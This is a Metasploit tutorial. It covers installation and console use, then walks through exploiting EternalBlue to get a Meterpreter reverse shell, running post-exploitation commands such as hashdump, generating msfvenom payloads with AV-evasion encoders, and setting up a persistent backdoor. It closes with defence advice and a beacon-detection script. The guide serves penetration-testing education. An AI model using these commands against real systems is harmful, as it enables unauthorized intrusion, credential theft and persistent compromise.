# **The Complete Guide to Metasploit Framework: Installation, Usage, and Practical Techniques**
Metasploit Framework is one of the most powerful penetration testing tools in Kali Linux, developed and maintained by Rapid7. It integrates vulnerability exploitation, payload generation, post-exploitation modules, and more, and is widely used for security assessments, red team exercises, and vulnerability research.
---
## **1. Introduction to Metasploit Framework**
Metasploit is an open-source penetration testing framework with the following core components:
- **Exploits**: Attack code targeting known vulnerabilities (e.g., EternalBlue, Heartbleed).
- **Payloads**: Code executed after a successful attack (e.g., reverse shell, Meterpreter).
- **Auxiliary Modules**: Non-exploitation modules for information gathering, scanning, DoS attacks, etc.
- **Post-Exploitation Modules**: Privilege escalation, lateral movement, data exfiltration, etc.
**Use Cases**:
- Penetration testing
- Vulnerability validation (PoC)
- Security research
- Red team operations
---
## **2. Installing Metasploit Framework**
### **On Kali Linux**
Kali Linux comes with Metasploit preinstalled, but you can update it manually:
```bash
sudo apt update && sudo apt install metasploit-framework
msfupdate # Legacy updater; on Kali it only prints a notice telling you to use apt instead
```
### **On Ubuntu/Debian**
```bash
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod +x msfinstall
./msfinstall
```
### **On Windows/macOS**
- **Windows**: Download the [Metasploit Pro trial](https://www.metasploit.com/) or use Kali WSL.
- **macOS**: Install via Homebrew:
```bash
brew install metasploit
```
---
## **3. Basic Usage of Metasploit**
### **Starting Metasploit**
```bash
msfconsole # Launch the interactive console
```
### **Common Commands**
| Command | Description |
|------|------|
| `help` | View help |
| `search [keyword]` | Search for exploits/modules (e.g., `search eternalblue`) |
| `use [module path]` | Load a module (e.g., `use exploit/windows/smb/ms17_010_eternalblue`) |
| `show options` | View current module configuration options |
| `set [option] [value]` | Set parameters (e.g., `set RHOSTS 192.168.1.100`) |
| `exploit` or `run` | Execute the attack |
| `sessions -l` | List active sessions |
| `sessions -i [ID]` | Interact with a session (e.g., `sessions -i 1`) |
---
## **4. Practical Example: Exploiting EternalBlue on Windows**
### **Step 1: Scan the Target**
```bash
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 192.168.1.100
run
```
If the output shows `VULNERABLE`, the target is exploitable.
### **Step 2: Exploit the Vulnerability to Get a Meterpreter Shell**
```bash
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.100
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.50 # Your Kali IP
exploit
```
Upon success, you’ll enter a `meterpreter` session.
### **Step 3: Post-Exploitation Actions**
```bash
sysinfo # View system info
getuid # Check current privileges
hashdump # Extract password hashes
screenshot # Take a screenshot
shell # Enter system shell
upload /path/file # Upload a file
```
---
## **5. Advanced Techniques**
### **1. Generating Payloads with AV Evasion**
```bash
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f exe -o payload.exe
```
Use encoders (e.g., `shikata_ga_nai`) to improve evasion. `x86/shikata_ga_nai` is a 32-bit encoder and will not encode the x64 payload used above, so this example switches to the x86 Meterpreter payload. Note that this encoder has been signatured by AV vendors for years, so by itself it does little against current AV/EDR products:
```bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe -o payload_encoded.exe
```
### **2. Creating Persistent Backdoors**
```bash
run persistence -X -i 10 -p 4444 -r 192.168.1.50
```
- `-X`: Auto-start on boot
- `-i 10`: Reconnect every 10 seconds
- `-p 4444`: Listening port
- `-r 192.168.1.50`: IP of the handler to connect back to
### **3. Automated Attacks (Resource Scripts)**
Create a script `autoattack.rc`:
```
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.100
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.50
exploit -j
```
Run it with:
```bash
msfconsole -r autoattack.rc
```
---
## **6. Defense Measures**
- **Patch promptly**: Metasploit's exploit modules target known vulnerabilities (EternalBlue is MS17-010); keeping systems patched removes most of what it can exploit.
- **Disable unnecessary services** (e.g., SMBv1).
- **Use EDR/XDR solutions** (e.g., CrowdStrike, Microsoft Defender ATP).
- **Monitor unusual network connections** (e.g., Meterpreter reverse shells).
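One way to act on the last bullet, as an added example that is not part of the original page: a small Python script that reads constructed firewall connection logs and flags outbound flows that use the default LPORT (4444) or reconnect at the fixed cadence the persistence example sets with `-i 10`. The log format, the addresses and the thresholds are assumptions made for the example.

```python
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample firewall log (not from the original page): outbound TCP
# connections from one internal host. The 192.168.1.50:4444 destination and
# the 10-second cadence mirror the LHOST/LPORT and "-i 10" settings above.
SAMPLE_LOG = """\
2024-05-01T10:00:00 src=192.168.1.100 dst=192.168.1.50 dport=4444 proto=tcp
2024-05-01T10:00:03 src=192.168.1.100 dst=93.184.216.34 dport=443 proto=tcp
2024-05-01T10:00:10 src=192.168.1.100 dst=192.168.1.50 dport=4444 proto=tcp
2024-05-01T10:00:20 src=192.168.1.100 dst=192.168.1.50 dport=4444 proto=tcp
2024-05-01T10:00:31 src=192.168.1.100 dst=192.168.1.50 dport=4444 proto=tcp
2024-05-01T10:00:40 src=192.168.1.100 dst=192.168.1.50 dport=4444 proto=tcp
2024-05-01T10:00:55 src=192.168.1.100 dst=93.184.216.34 dport=443 proto=tcp
"""

# Default LPORT of msfvenom and of the examples above; a weak signal alone,
# so it is reported alongside the timing analysis rather than instead of it.
SUSPICIOUS_PORTS = {4444}

def parse_line(line):
    """Split one 'timestamp key=value ...' log line into its fields."""
    ts, *fields = line.split()
    kv = dict(f.split("=", 1) for f in fields)
    return datetime.fromisoformat(ts), kv["src"], kv["dst"], int(kv["dport"])

def find_beacons(log_text, min_connections=4, max_jitter=0.2):
    """Flag flows on a Metasploit default port or with a near-constant reconnect interval."""
    flows = defaultdict(list)
    for line in log_text.splitlines():
        if line.strip():
            ts, src, dst, dport = parse_line(line)
            flows[(src, dst, dport)].append(ts)
    findings = []
    for (src, dst, dport), times in flows.items():
        times.sort()
        reasons = []
        if dport in SUSPICIOUS_PORTS:
            reasons.append(f"default Metasploit port {dport}")
        if len(times) >= min_connections:
            gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
            avg = mean(gaps)
            # A small spread between gaps relative to the mean means regular beaconing.
            if avg > 0 and pstdev(gaps) / avg <= max_jitter:
                reasons.append(f"regular beacon every ~{avg:.0f}s ({len(times)} connections)")
        if reasons:
            findings.append({"src": src, "dst": dst, "dport": dport, "reasons": reasons})
    return findings
```

Running `find_beacons(SAMPLE_LOG)` reports only the 192.168.1.100 to 192.168.1.50:4444 flow, on both the port and the timing signal; the HTTPS traffic is left alone.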
---
## **7. Learning Resources**
- **Official Docs**: [Metasploit Documentation](https://docs.metasploit.com/)
- **Books**: *The Metasploit Penetration Testing Guide*
- **Practice Labs**: [VulnHub](https://www.vulnhub.com/), [Hack The Box](https://www.hackthebox.com/)
---
## **Conclusion**
Metasploit Framework is a core tool for penetration testing, enabling efficient vulnerability exploitation, privilege escalation, and lateral movement. However, **use it only for authorized testing** to avoid legal issues. Practice in lab environments (e.g., VirtualBox + Metasploitable) for skill development.